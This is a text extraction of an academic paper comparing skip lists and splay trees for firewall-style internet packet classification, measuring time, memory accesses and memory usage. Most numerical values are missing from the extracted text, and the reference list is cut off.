/grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted march accepted june published july corresponding author mahdi abbasi, abbasi@basu.ac.ir academic editor sándor szénási additional information and declarations can be found on page doi . /peerj-cs. copyright khezrian and abbasi distributed under creative commons cc-by . open access comparison of the performance of skip lists and splay trees in classification of internet packets navid khezrian and mahdi abbasi computer engineering faculty, sharif university of technology, tehran, iran department of computer engineering, engineering faculty, bu-ali sina university, hamedan, iran abstract due to the increasing number of internet users and the volume of information exchanged by software applications, internet packet traffic has increased significantly, which has highlighted the need to accelerate the processing required in network systems. packet classification is one of the solutions implemented in network systems. the most important issue is to use an approach that can classify packets at the speed of the network and show optimum performance in terms of memory usage. in this study, we evaluated the performance in packet classification of two of the most important data structures used in decision trees, i.e. the skip list and splay tree. our criteria for performance were the time of packet classification, the number of memory accesses, and memory usage of each event. these criteria were tested by the acl and ipc rules with different numbers of rules as well as by different packet numbers. the results of the evaluation showed that the performance of skip lists is higher than that of splay trees. by increasing the number of classifying rules, both the difference in the speed of packet classification and the superiority of the performance of the skip list over that of the splay tree become more significant. the skip list also maintains its superiority over the splay tree in lower memory usage. the results of the experiments confirm the scalability of this method in comparison to the splay tree method. subjects algorithms and analysis of algorithms, computer networks and communications keywords skip list, splay tree, firewall, memory, time, perforrmance introduction the internet is the largest packet-switching network. in this network, information is transmitted in the form of packets from the source to the destination. with the increase in the number of users and the volume of information exchanged by applications, internet packet traffic has increased significantly. for this reason, in order to accelerate the processing required in network systems such as routers, a basic process called packet classification is used (baboescu & varghese, ; taylor, ; perez et al., ). classification of network packets refers to the different streams of packets in network systems (bontupalli et al., ; harada, tanaka & mikawa, ; inoue et al., ; li et al., ; bi, luo & sun, ). many network systems use packet routing and guiding policies as well as quick implementation of packet classification policies to carry out traffic management policies (li et al., ; lin et al., ; tessier et al., ). using these basic processes, packet flow how to cite this article khezrian n, abbasi m. . comparison of the performance of skip lists and splay trees in classification of inter- net packets. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:abbasi@basu.ac.ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. processing has become possible at a very high speed, and the same rules can be applied to all packets belonging to the same traffic stream (comer, ). network applications that require packet classification are of three types, i.e., security operations, traffic management and quality of service (qos), and policy-based routing. several studies have analytically or experimentally have benchmarked the different algorithms of packet classification (gao, tan & gong, ; qi et al., ; lim, ; nagpal et al., ). a commonly accepted categorization of the packet classification algorithms is the one presented by taylor ( ). according to this categorization, the packet classification fall into four classes which are explained below. exhaustive search in this type of algorithm, all elements within a list are checked to match the search query argument. the main disadvantage of these algorithms is the linear dependence of time complexity on the number of filters (trabelsi & zeidan, ). decomposition in decomposition-based algorithms, two processing steps are followed. in the first step, the search is performed individually on the filter set based on each field. in the second step, the results of all searches on the different fields are merged through intersection (neji & bouhoula, ). therefore, it is obvious that these algorithms have great potential for parallelism. however, the large size of the data structures required in these algorithms makes them inefficient in terms of memory usage. tuple spaces in this method, the filters are divided by the number of bits specified in the prefixes of the search query, and the search space is thus partitioned into several sub-spaces. during classification, the input packets are carefully matched and checked against the generated tuples using the simple or tree-based search algorithm on the prefix fields of interest (kirschenhofer, martínez & prodinger, ). when matching a packet with a tuple is successful, only those filters are evaluated that are in the equivalent sets of the tuple with regard to their matching with other fields of the packet. the memory complexity of these algorithms is less than the decomposition-based algorithms (srinivasan, suri & varghese, ). decision tree in these algorithms, the set of filters is stored in search trees based on the binary patterns in the prefix fields of the filters. to make a decision tree based on several fields, a tree is created in which the leaves contain a specified filter or a subset of filters that have an intersection in the traversed prefix from the root to the leaves. in these algorithms, the best filter corresponding to the input package is found through the binary contents of the fields in question on the search tree (sen, ). the existing methods have not been able to balance the time and memory consumption. on the other hand, binary trees work well when the elements enter accidentally, but they become inefficient in cases where the operations are sequential. tree algorithms khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. use different data structures for searching. two of the most important data structures of decision trees are the splay tree (sleator & tarjan, ) and the skip list (kaufmann, ). the performance of a splay tree depends on the history of accesses to its elements. on the other hand, the performance of a skip list depends on an independent randomization of the height of links that lead to specific elements. therefore, probabilistic methods are used to analyze the operation of splay trees and skip lists. we refer the reader to references (papadakis, ; pugh, ; sen, ; papadakis, ; kirschenhofer, martínez & prodinger, ) for probabilistic analysis of the complexity of these algorithms. in this paper, we intend to evaluate and compare the performance of packet-classifying tree algorithms using these two different data structures. for this purpose, we will use the criteria of time complexity and memory complexity. time complexity depends on the number of algorithmic references to memory to classify each packet and memory complexity depends on the amount of memory used by the data structure of the algorithm. the structure of the paper is organized as follows. first, we review the history of packet- classifying tree algorithms and related previous works for evaluating their performance. the third section describes the general structure of the tree algorithms based on skip lists and splay trees along with their implementation. in the fourth section, after introducing the tools used to produce filters and packets, the evaluation criteria are presented and the results of the evaluation of the performance of the two approaches are compared. the final section draws conclusions and indicates directions for further research. background the main aim of the paper is to compare the performance of the skip list and splay tree data structures when adapted to multidimensional search on the rule set of a packet classifier. the nature of the search, insert and update of such data structures lets tree-based packet classifiers to reduce the number of required memory during search and hence reduce the complexity of classification. a review of recent research suggests that no study so far has conducted to make an in-depth comparison of the performance of packet-classifying tree algorithms operating with skip lists and splay trees. previous works simply aimed at optimizing these algorithms without comparing their performance. pan et al. ( ) used the skip list in to improve the time performance of information retrieval algorithms in local lists. in their design, given that a packet might share a prefix with previous packages, search in the skip list starts from the closest node previously obtained from this prefix. therefore, a significant amount of time is saved. extensive evaluations show that their design can triple the speed of the original design on a -bit machine. in , trabelsi et al. ( ) proposed a multi-stage and dynamic packet filtering mechanism to enhance the performance of the firewall. their proposed mechanism is implemented by splay tree filters and uses traffic features to minimize packet filtering time. it can decide whether or not dynamic updates of the splay tree filters are needed to filter the next network traffic window and predict the best customized pattern for the tree. in this method of input packet filtering, the initial acceptance of the packet is done using khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. splay tree data structure, which is dynamically updated according to the traffic streams of the network. as a result, frequent packets have less memory access and, therefore, the total packet filtering time is reduced. in , zhong, geng & zhao ( ) focused on a simple and very important form of remote authentication problem. in this form, membership requests for a dynamic set of n data elements which are stored in unknown directories are verified. in their study, some of the available methods for confirming membership requests such as the merkle hash tree, skip list, and rsa tree were examined for the first time. in all of these methods, the data structures used by the algorithm to update the data are not fast enough and may have a high complexity time. it could also be possible to reconstruct a range of data structures during the update process. therefore, they used the b+ tree data structure with rsa accumulators for the authentication scheme, which requires lower computational costs for membership queries in a dynamic data set. trabelsi & zeidan ( ) provided in a mechanism to improve the filtering time of firewall packets by optimizing the comparison order of the matched security-rule fields to decide on the early rejection of incoming packets. their proposed mechanism was based on changing the order of filtering fields according to traffic statistics. it also allowed to use multi-level classifying filters. therefore, their proposed mechanism can be considered as a mechanism for protecting the device against denial-of-service attacks (dos). early packet acceptance is accomplished through the use of splay trees and changes dynamically with respect to traffic streams. therefore, frequent packets have less memory access, thereby reducing the matching time. the purpose of their proposed method was to overcome some of the limitations of the previous technique called self-adjusting binary search on prefix length (sa-bspl). the numerical results of the simulation show that their proposed mechanism can improve the firewall performance in terms of total packet processing time compared to the sa-bspl method. zeidan & trabelsi ( ) in provided a mechanism to improve firewall performance through the rejection of denial-of-service attacks. to do this, they used a security policy of filtering as well as a statistical traffic plan that was implemented in the form of multi-level filter, splay tree, and hash tables. the proposed design rejects unwanted traffic and repetitive packets in the early stages and, therefore, less memory is used. as a result, packet matching time is generally reduced. the results of the evaluation of this method indicate that the proposed mechanism significantly reduces the processing time of dos traffic. trabelsi & zeidan ( ) explored firewall packet rejection techniques in . two of these techniques include fvsc and pber that introduce the concept of approximate policy instead of using the full policy provided by the administrator. the benefit of such policies is that they are quicker at evaluating and adapting to dynamic traffic. the third technique, which is called sa-bspl, uses the splay tree data structure. this data structure dynamically changes according to traffic behavior so that, when a node containing highly matching rules with packets is located close to the root, necessary actions on the packet are possible at a faster rate. these techniques allow the maximum number of packets to be processed as quickly as possible, thereby reducing the time of filtering process. khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. neji & bouhoula ( ) presented a dynamic packet routing algorithm in . they considered a self-regulating tree by combining a binary search pattern on the prefix length with a splay tree. using a set of hash tables and a splay tree, packet filtering was done according to the destination address. their research paid particular attention to packets driven by the default path because it covered a major part of routers’ traffic. their design was better than previous models, especially for very diverse inputs, and had a logarithmic time cost for doing its tasks. in , kirschenhofer, martínez & prodinger ( ) decided to mark the elements whose keys had been compared in the search algorithm in order to avoid unnecessary comparisons of the keys during the search in the skip list. their evaluation criterion in this study was a detailed analysis of the total search cost (expectation and variance) so that the search cost would be calculated based on key-to-key comparisons and the results would be compared with standard search results. their comparison shows that the cost of their method is much less than the standard search cost. algorithms and tools this section describes how the algorithms in question operate. consider the sample rules in table . this set of rules is arranged in descending order based on the fixed length of the source addresses, and if the source addresses are equal, the sorting operations are performed according to the destination addresses. thus, the address placed at the top of the table has a higher priority than other addresses. the set of the source and destination prefix addresses of the rules must be converted into a range of integers (trabelsi & zeidan, ). for this purpose, the upper and lower boundaries are first calculated for each prefix in the set of source addresses, as shown in table . for the sake of simplicity, the prefix addresses are displayed in a six-bit format. splay tree for each field including the source address, destination address, source port number, destination port number, and protocol type, a splay tree should be created (trabelsi & zeidan, ; trabelsi & zeidan, ; trabelsi et al., ). in addition to pointers to the left and right children as well as the parent node, each node of the tree contains a value and a counter to hold the number of times the node is matched with the input packets and a list for storing the rules. initially, the counter of all nodes is set to zero. in the protocol tree, each node contains a list of rules whose protocol field has a value is equal to the value of the node, but in other trees each node contains a list of rules in which the lower boundary is less than or equal to the value of the node and the upper boundary is greater than or equal to the value of the node. as the values of the fields of source address, destination address, source port number, and destination port number have both upper and lower boundaries, they should be inserted into the corresponding trees in two steps (trabelsi & zeidan, ; trabelsi et al., ). in the first step, the lower boundary is inserted into the tree. if the lower boundary is less than the root value, it is inserted under the left tree, and if it is greater than the root value, it will be inserted under the right tree. then the value of the lower boundary node khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table an example of a set of rules. each row of the table is a rule of a rule set. each rule is represented as constraints on source ip, destination ip, source port number, destination port nummber and protocol. rule source ip address destination ip address source port number destination port number protocol r * * , , r * * , , r * * , , r * * , , r * * , , table an example of converting source prefix addresses to a numerical range. each prefix at the sec- ond column of the table is converted to corresponding upper and lower boundaries which are presented at the third and fourth columns. the fifth and sixth columns corresponds to decimal representation of the start and end points of the boundary. rule source prefix addresses lower boundary upper boundary start end r * r * r * r * r * is compared with the upper and lower boundary values of all the rules. when the lower boundary value lies within the range of a rule, the id of that rule is added to the list of lower boundary rules. after being added to the tree, the lower boundary node will be moved to the root of the tree using the rotation operation. the second step is to insert the upper boundary into the tree. this step resembles the insertion of the lower boundary. figure shows the steps for creating a splay tree for the source address fields of the rules in table . in fig. a, the r rule has been added to the tree. to this end, first the lower boundary value is inserted. since the value of lies within the range of r and r , the id of these rules is added to the rules list. then, the value of is inserted and the ids of r and r rules are added to its rules list. finally, is transferred to the root of the tree with a left rotation. in fig. b, the r rule has been added to the tree. in this case, the value of is inserted. first the node is searched in the tree and, if it is not found, it will be inserted in the correct place and the ids of r , r , and r are added to the its rules list. finally, the node is transferred to the root through a right rotation between and and a right rotation between and . in fig. c, the value of , which is the lower boundary of r , is inserted. in the next step, the r , r , and r rules are added to its list of rules. then the node is transferred to the root with through a right rotation between the nodes and and a left rotation between and . finally, the r rule is added to the tree. since its values have already been added, no change occurs in the tree. skip list to build skip lists (pan et al., ), the set of rules is first transmitted to the program and the upper and lower boundaries of the rules are calculated. for each of the fields of khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the steps of creating a splay tree. (a) inserting the r rule; (b) inserting the lower boundary of the r rule; (c) inserting the upper boundary of the r rule. full-size doi: . /peerjcs. /fig- source address, destination address, source port number, destination port number, and protocol type, a skip list must be created. each skip list contains a value, a list for storing rules, and a list for storing pointers to subsequent nodes based on the level of each node. to determine the level of each node, a random function is used which creates an integer in a specified range (between and in our implementation). in the protocol skip list, each node contains a list of rules whose protocol field has a value equal to the value of the node, but in other skip lists each node contains a list of rules in which the lower boundary of the corresponding field is less than or equal to the value of the node and the upper boundary of the corresponding field is greater than or equal to the value of the node. as the values of the fields of source address, destination address, source port number, and destination port number have both upper and lower boundaries, they should be inserted into the corresponding skip lists in two steps. in the first step, the lower boundary is inserted into the skip list. then the value of the lower boundary node is compared with the upper and lower boundary values of all the rules. when the lower boundary value lies within the range of a rule, the id of that rule is added to the list of lower boundary rules. then, based on the node’s level, a list of pointers is built for the created node. in the second step, we add the upper boundary. this step resembles the insertion of the lower boundary. figure shows the steps for creating a skip list for the source address field in table . in fig. , the r rule has been added to the skip list. first, the lower boundary of at the level is inserted into the skip list. since the value of lies within the range of r and r , the id of these rules is added to the rules list. then the upper boundary of at the level is inserted and the ids of r and r rules are added to its rules list. in fig. b, the r rule has been added to the skip list. the value of at the level is inserted and the ids of r , r , and r are added to its rules list. next, the value of at the level is inserted and the ids of r , r , and r are added to its rules list. in fig. c, the r rule is added to the skip list. the values of this rule are repetitive. packet classification with both skip lists and splay trees, packet classification is as following. when a packet is received, the information of its header including source and destination address, source and destination port number, and protocol type are extracted. next, for each of the mentioned khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure steps to create skip list. (a) inserting the r rule; (b) inserting the r rule; (c) inserting the r rule. full-size doi: . /peerjcs. /fig- fields in the packet, a skip list or a splay tree is created and searched simultaneously to find a matching node. search results on any list or tree include a list of matching rules. in order to find a common rule between the five lists obtained from the splay trees, an intersection operation is performed between them. the result of the intersection may be null or contain several rules. if the result is null, the action associated with the default rule is applied to the packet; otherwise, the action related to the rule with the highest priority is applied. because the rules were initially arranged according to priority, the rule with the smallest row number has the highest priority. as mentioned in the previous section, splay trees are binary search trees that self-adjust so that the deepest met surviving node in any operation becomes the root following the operation. the splay tree stores no balance or weight information, but it performs many tree rotations after every access, which makes it less practically efficient than skip lists in many applications. these rotations can be particularly harmful when nodes are augmented with auxiliary structures. this situation is present in packet classification. simple operations like move-to-root could partially solve this problem and improve the performance of the splay trees when there is locality of references in the operation sequence. but, it is not ideal in the case of packet classification where the sequence of the burst operations has no predictable locality (sahni & kim, ). on the contrary, the simplicity of skip list algorithms makes them easier to implement and provides significant constant factor speed improvements over balanced tree and self- adjusting tree algorithms like splay trees (dean & jones, ). their scheme is designed to give good expected performance for busty access patterns (sahni & kim, ). skip lists are also very space efficient (sen, ; kirschenhofer, martínez & prodinger, ). to practically investigate the above predictions about the performance of these two competitor algorithms, we implement and experiment them on several data sets. implementation and evaluation splay tree and skip list approaches were implemented in c++ and executed ten times on a system with intel core i . ghz and gb of ram. the performance criteria were calculated using average results. khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the two approaches were evaluated based on the number of memory accesses for packet classification, classification time, and memory usage. the class bench tool (taylor & turner, ) was used to generate rule sets and packet headers. the acl and ipc rules were created in the evaluations to compare the number of memory accesses for packet classification as well as the times of packet classification with , k, and k rules. for our evaluations, we generated a set of k, k, and k packet headers corresponding to each of the set of rules. we also used ipc and acl rules to determine the amount of memory usage. first, we look at packet classification time which is the time span from when a packet enters the structure of a classifier until the system can find the matching rule for that packet. the shorter the packet classification time, the more efficient the structure of the classifier will be. figure shows the time for classifying a wide variety of packets based on the sets of , k, and k acl and ipc rules for the skip list and splay tree. figure a compares these two approaches for k packets. in these charts, the smallest difference between the two approaches is observed for rules and the largest difference for k rules. the skip list classifies packets for ipc and acl rules in and , ms, respectively, and the splay tree does this in , and , ms, respectively. also, the packet classification time of the skip list for k ipc and acl rules is and , ms, respectively, while this time for the splay tree is and , ms, respectively. it can be concluded that, with an increased number of rules, the difference in classification time between the performances of the two approaches becomes greater. in fact, the skip list performs this task more optimally than the splay tree. also, the type of rules plays an important role in packet classification time so that packets are classified in a significantly shorter time when matched with ipc rules. a decreased number of rules would reduce the time difference while increased number of rules would increase this difference. consequently, the choice of the type of rules for packet classification might affect performance. figure b evaluates both the skip list and splay tree for k packets. as mentioned in fig. a, the least difference in packet classification time between acl and ipc rules is observed for rules where as the largest difference is observed for k rules. the skip list classifies packets for ipc and acl rules in , and , ms, respectively, and the splay tree does this in , and , ms, respectively. also, the packet classification time of the skip list for k ipc and acl rules is , and , ms, respectively, while this time for the splay tree is , and , ms, respectively. as a result, with the increase in the number of packets, the skip list still outperforms splay tree in terms of packet classification time. however, increased number of packets has difference in packet classification time of the two approaches for acl rules smaller than that for ipc rules. this means that, if the number of rules is small enough, an increased number of packets could be best handled by acl rules; otherwise, ipc rules should be used for larger numbers of rules. the difference is particularly significant in classification with k rules. in fig. c, the results of the classification of k packages are evaluated. in this evaluation, too, the skip list has a better performance than the splay tree. for the set of ipc rules, the smallest difference between the two approaches can be observed for k rules. in this case, the skip list classifies packets in , ms and the splay tree does this in , ms. as in the previous part, the khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure packet classification time for the sets of , k, and k acl and ipc rules for different num- bers of packets. (a) k, (b) k, and (c) k packets. full-size doi: . /peerjcs. /fig- khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. smallest difference between these two approaches is observed for the set of acl rules so that the packet classification time of the skip list is , ms whereas that of the splay tree is , ms. the difference in packet classification time between skip list and splay tree with both ipc and acl rules is significant. this result can be used to select appropriate rules for designing a system that is to be efficient in terms of packet classification. here again, the greatest difference between the two approaches is manifested in the case of k rules. with k ipc and acl rules, the skip list classifies packets in , and , ms, respective, while splay tree does this task in , and , ms, respectively. as can be seen, this time difference for the ipc rules is much smaller than for the acl rules. in general, fig. shows that skip list approach classifies packets in a shorter time. in addition, the increase in the packet classification time of the skip list due to increased number of rules is significantly less than that of the splay tree. it can be inferred that skip list has a better performance than the splay tree in the classification of packets. one of the most important criteria for the performance of classification approaches is the speed of search. in the architecture of network processors, memory access is the most important reason for prolonged execution of commands on packets. frequent access to memory reduces system performance. reduced memory access would decrease packet classification time and, thus, accelerate the process. therefore, decreased memory access is central to the efficiency of an approach. figure a evaluates the two approaches for k packets. as can be seen, in all cases skip list has fewer memory accesses than splay tree. also, the minimum number of memory access is , , which belongs to skip list with ipc rules. splay tree has , memory accesses with k acl rules, which is the highest number of access in our evaluation. with the increase in the number of rules, the difference in memory access between the two approaches increases significantly. with k ipc and acl rules, the skip list has , and , memory accesses, respectively, while the splay tree accesses memory , and , times, respectively. the greatest difference in the number of memory accesses between the skip list and splay tree is observed in the case of k acl rules in which splay tree accesses memory , times more than skip list. figure b compares skip list and splay tree for k packets. as in previous parts, the skip list outperforms the splay tree in terms of memory access. in general, the minimum number of memory access is , which belongs to the skip list with ipc rules. the maximum number is which belongs to the splay tree with k acl rules. the greatest difference in the number of memory accesses between the skip list and the splay tree is observed in the case of k acl rules in which the splay tree accesses memory times more than the skip list. it can be observed in the chart that the number of memory accesses for both approaches using ipc rules is much smaller than using acl rules, which could be a reason for preferring ipc rules in the design of such systems. figure c compares the skip list and the splay tree with k packets. the chart shows that, with increase in the number of packets with different numbers of rules, the skip list has less memory access than does the splay tree. in this chart, the smallest number of memory access is which belongs to the skip list with ipc rules and the largest number of access is which belongs to the splay tree with k acl rules. the greatest difference between the two approaches is observed in khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the number of memory accesses for packet classification with sets of , , , and , acl and ipc rules for different number of packets. (a) k, (b) k, and (c) k packets. full-size doi: . /peerjcs. /fig- the case of k acl rules, with the splay tree having accessed memory times more than the skip list. as can be seen in fig. , the skip list has a better performance than the splay tree in terms of memory access. also, with increasing number of rules, the increase in the number of memory accesses for the skip list is much smaller than that of the splay khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure memory usage for k acl and ipc rules. the red and blue bars represent the memory usage of the splay tree and skip list algorithms respectively. full-size doi: . /peerjcs. /fig- tree. as a result, the performance of the skip list can be considered as more efficient than the splay tree. according to the results of the charts in figs. and , another important point is correspondence in the results of memory access time and number which exactly confirm each other in all cases. given the memory limitations in the majority of systems and the high costs of upgrading memories, another performance criterion for classification approaches is the amount of memory usage. as a result, every approach should aim at reducing memory usage. figure shows the amount of memory used in bytes by skip list and splay tree for classifying packets with k acl and ipc rules. as can be seen, the amount of memory used by skip list is , bytes with ipc rules and , bytes for acl rules whereas the memory usage of splay tree is , bytes for ipc rules and , bytes for acl rules. the amount of memory used by skip list with both sets of rules is slightly more than splay tree. this additional amount of space is used to hold pointers in a skip list. also, the amount of memory used by both approaches with ipc rules is significantly less than the memory used with acl rules. however, this additional space can be reasonably justified by significant reduction in the number of memory accesses and packet classification time in skip lists. conclusion packet classification is among the basic processes in network processors. the most important issue is the use of a packet classification approach that can keep up with the network speed. such an approach should also optimize memory consumption. the existing methods have not been able to balance the time and memory consumption. on the other hand, binary trees work well when the elements enter accidentally, but they become inefficient in cases where the operations are sequential. in this study, therefore, we focused on the skip list and the splay tree and evaluated these two approaches with acl and ipc rules. our results suggest that skip list performs better in terms of package khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. classification time and the number of memory accesses. also, with increase in the number of rules, packet classification time and memory access increase less in a skip list than in a splay tree. the amount of memory used by the skip list is slightly more than the splay tree, which is due to storing the pointers in skip lists. however, this additional space can be reasonably justified by significant reduction in the number of memory accesses and packet classification time in skip lists. accordingly, the skip list can be considered as superior to the splay tree. obviously, the data and control dependencies in the algorithms will change their performance in parallel processing. therefore, the authors aim to study the parallelization of both algorithms on graphics processors and evaluate the performance of their parallel versions in further research. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • navid khezrian performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, approved the final draft. • mahdi abbasi conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, submission of the paper. data availability the following information was supplied regarding data availability: the raw measurements are available in supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references baboescu f, varghese g. . scalable packet classification. acm sigcomm computer communication review ( ): – doi . / . . bi x-a, luo x, sun q. . branch tire packet classification algorithm based on single-linkage clustering. mathematics and computers in simulation : – doi . /j.matcom. . . . bontupalli v, yakopcic c, hasan r, taha tm. . efficient memristor-based archi- tecture for intrusion detection and high-speed packet classification. acm journal on emerging technologies in computing systems ( ): . khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /j.matcom. . . http://dx.doi.org/ . /peerj-cs. comer de. . network systems design with network processors, agere version. upper saddle river: prentice hall. dean bc, jones zh. . exploring the duality between skip lists and binary search trees. in: proceedings of the th annual southeast regional conference. new york: acm, – . gao l, tan m-f, gong z-h. . survey and evaluation of ip packet classification algorithms. computer engineering & science ( ): – . harada t, tanaka k, mikawa k. . acceleration of packet classification via inclusive rules. in: ieee conference on communications and network security (cns). piscataway: ieee. inoue t, mano t, mizutani k, minato s-i, akashi o. . fast packet classification algorithm for network-wide forwarding behaviors. computer communications : – doi . /j.comcom. . . . kaufmann m. . network routing algorithms, protocols, and architectures. burlington: morgan kaufmann. kirschenhofer p, martínez c, prodinger hjtcs. . analysis of an optimized search algorithm for skip lists. theoretical computer science ( – ): – . li w, li x, li h, xie g. . cutsplit: a decision-tree combining cutting and splitting for scalable packet classification. in: ieee infocom —ieee conference on computer communications. piscataway: ieee. li y, zhang d, liu ax, zheng j. . gamt: a fast and scalable ip lookup engine for gpu-based software routers. in: proceedings of the ninth acm/ieee symposium on architectures for networking and communications systems. piscataway: ieee press. lim h. . survey and proposal on packet classification algorithms. in: interna- tional conference on high performance switching and routing. piscataway: ieee. lin f, wang g, zhou j, zhang s, yao x. . high-performance ipv address lookup in gpu-accelerated software routers. journal of network and computer applications : – doi . /j.jnca. . . . nagpal b, singh n, chauhan n, murari r. . a survey and taxonomy of various packet classification algorithms. in: international conference on advances in computer engineering and applications. piscataway: ieee. neji nb, bouhoula a. . self-adjusting scheme for high speed routers. in: rd ieee conference on local computer networks (lcn). piscataway: ieee. pan t, huang t, liu j, zhang j, yang f, li s, liu y. . fast content store lookup using locality-aware skip list in content-centric networks. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee. papadakis t. . skip lists and probabilistic analysis of algorithms. phd dissertation, university of waterloo. perez kg, yang x, scott-hayward s, sezer s. . optimized packet classification for software-defined networking. in: ieee international conference on communications (icc). piscataway: ieee. pugh w. . skip lists: a probabilistic alternative to balanced trees. communications of the acm ( ): – . khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.comcom. . . http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /peerj-cs. qi y, xu l, yang b, xue y, li j. . packet classification algorithms: from 